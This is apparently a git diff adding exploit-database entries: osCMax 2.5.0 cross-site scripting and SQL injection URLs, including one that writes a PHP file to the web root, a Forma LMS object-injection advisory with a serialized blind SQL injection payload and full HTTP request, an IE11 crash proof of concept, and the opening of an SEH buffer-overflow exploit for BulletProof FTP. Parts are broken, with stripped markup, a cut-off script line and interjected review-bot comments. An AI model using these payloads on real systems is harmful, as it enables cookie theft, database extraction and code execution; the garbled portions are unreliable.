index 000000000..590534349
--- /dev/null
+++ b/platforms/php/webapps/37045.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52886/info
+
+osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+osCMax 2.5.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/admin/geo_zones.php?action=list&zID=%27%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/37046.txt b/platforms/php/webapps/37046.txt
new file mode 100755
index 000000000..18e11e84c
--- /dev/null
+++ b/platforms/php/webapps/37046.txt
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin/new_attributes_include.php?pageTitle=%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37047.html b/platforms/php/webapps/37047.html new file mode 100755 index 000000000..535170813 --- /dev/null +++ b/platforms/php/webapps/37047.html @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +
+ + + +
\ No newline at end of file diff --git a/platforms/php/webapps/37048.txt b/platforms/php/webapps/37048.txt new file mode 100755 index 000000000..82b5d768c --- /dev/null +++ b/platforms/php/webapps/37048.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin/stats_monthly_sales.php?status=0 union select '' INTO OUTFILE '../../../path/to/site/file.php' \ No newline at end of file diff --git a/platforms/php/webapps/37055.txt b/platforms/php/webapps/37055.txt new file mode 100755 index 000000000..edb4280c4 --- /dev/null +++ b/platforms/php/webapps/37055.txt 
@@ -0,0 +1,56 @@ +Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities + +[+] Author: Filippo Roncari +[+] Target: Forma LMS +[+] Version: 1.3 and probably lower +[+] Vendor: http://www.formalms.org +[+] Accessibility: Remote +[+] Severity: High +[+] CVE: +[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf +[+] Info: f.roncari@securenetwork.it / f@unsec.it + + +[+] Summary +Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more. + + +[+] Vulnerability Details +Forma LMS 1.3 is prone to multiple PHP Object Injection vulnerabilities, due to a repeated unsafe use of the unserialize() function, which allows unprivileged users to inject arbitrary PHP objects. A potential attacker could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input, in order to execute code on the remote server or abuse arbitrary functionalities. + + +[+] Technical Details +See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for the list of identified OI flaws and further technical details. + + +[+] Proof of Concept (PoC) +The following PoC shows how to abuse the unsafe unserialize() called in writemessage() function in order to trigger a SQL injection flaw. This is an alternative way to exploit one of the identified OI, since a quick check did not highlight useful magic methods. The PoC as well as the other identified vulnerabilities are further detailed in the full advisory. + + + [!] 
PoC Payload + ---------------------------- + a:2:{i:0;s:122:"0) union select if(substring(pass,1,1) = char(53),benchmark(5000000,encode(1,2)),null) from core_user where idst=11836-- ";i:1;s:1:"1";} + ---------------------------- + + [!] PoC Request + ---------------------------- + POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1 + Host: localhost + Cookie: docebo_session=91853e7eca413578de70304f94a43fe1 + Content-Type: multipart/form-data; boundary=---------------------------1657367614367103261183989796 + Content-Length: 1453 + + [...] + + -----------------------------1657367614367103261183989796 + Content-Disposition: form-data; name="message[recipients]" + + a%3A2%3A%7Bi%3A0%3Bs%3A122%3A%220%29+union+SELECT+IF%28SUBSTRING%28pass%2C1%2C1%29+%3D+ char%2853%29%2Cbenchmark%285000000%2Cencode%281%2C2%29%29%2Cnull%29+from+core_user+where+idst% 3D11836--++%22%3Bi%3A1%3Bs%3A1%3A%221%22%3B%7D + + [...] + -------------------------- + + + +[+] Disclaimer +Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. \ No newline at end of file diff --git a/platforms/windows/dos/37060.html b/platforms/windows/dos/37060.html new file mode 100755 index 000000000..989193719 --- /dev/null +++ b/platforms/windows/dos/37060.html 
@@ -0,0 +1,55 @@ +# Exploit Title: Internet Explorer 11 - Crash PoC +# Google Dork: N/A +# Date: 19th May, 2015 +# Exploit Author: garage4hackers +# Vendor Homepage: http://garage4hackers.com/showthread.php?t=6246 +# Software Link: N/A +# Version: Tested on IE 11 +# Tested on: Windows 7 +# CVE : N/A + + + +case522207.html + + + + + + +How do I reproduce it? + +- It has been discovered, tested & reduced on Win7 32-bit Ultimate and runs successfully anytime. + +a) Enable Page Heap # gflags.exe /p /enable iexplore.exe /full +b) Execute runMe.html in WinDbg +c) Tested on Win7 32-bit, Win8.1 32-bit, Win8.1 64-bit (not working on Win8, IE 10) \ No newline at end of file diff --git a/platforms/windows/local/37056.py b/platforms/windows/local/37056.py new file mode 100755 index 000000000..451e9d4a3 --- /dev/null +++ b/platforms/windows/local/37056.py @@ -0,0 +1,119 @@ +#-----------------------------------------------------------------------------# +# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) # +# Date: Feb 15 2015 # +# Exploit Author: Gabor Seljan # +# Software Link: http://www.bpftp.com/ # +# Version: 2010.75.0.76 # +# Tested on: Windows XP SP3 English # +# Credits: His0k4 # +# CVE: CVE-2008-5753 # +#-----------------------------------------------------------------------------# + +#!/usr/bin/python + +from struct import pack + +# offset to SEH is 93 byte +buf = b'A' * 13 +buf += pack(' + + + +
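Review bot: The reproduction steps say `Execute runMe.html in WinDbg`, while the file's own header line names `case522207.html` and it is committed as `37060.html`; the steps and the header should name the same file, e.g. `b) Open 37060.html (case522207.html) in IE under WinDbg`. The hunk header announces 55 lines, but only the `#` header comments, the `case522207.html` line and the three steps are visible here — the HTML/script body that is supposed to trigger the crash does not appear in this rendering, possibly because it was stripped as markup; if the committed file really carries no markup, the entry is not reproducible as is and should say so. `Vendor Homepage` points to the garage4hackers forum thread rather than the vendor; that URL belongs under a `Reference:` line.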
+ + + + + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file
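Review bot: The `#!/usr/bin/python` shebang sits after the ten-line `#---` header banner and a blank line, so it is not on line 1 and has no effect; move it to the first line and let the banner follow. The `buf += pack('` line is cut off in this rendering, most likely because the `<` of a `pack('<L', ...)` format string was consumed as markup, and the remaining lines of the 119-line hunk are not visible here, so the `# offset to SEH is 93 byte` comment cannot be checked against the padding that follows `buf = b'A' * 13`. The header's `CVE: CVE-2008-5753` identifier dates to 2008 while the title and `Version: 2010.75.0.76` target the 2010 build; a one-line comment stating that the 2010 release reintroduces (or never fixed) the flaw behind that CVE would save the reader from assuming a mismatch.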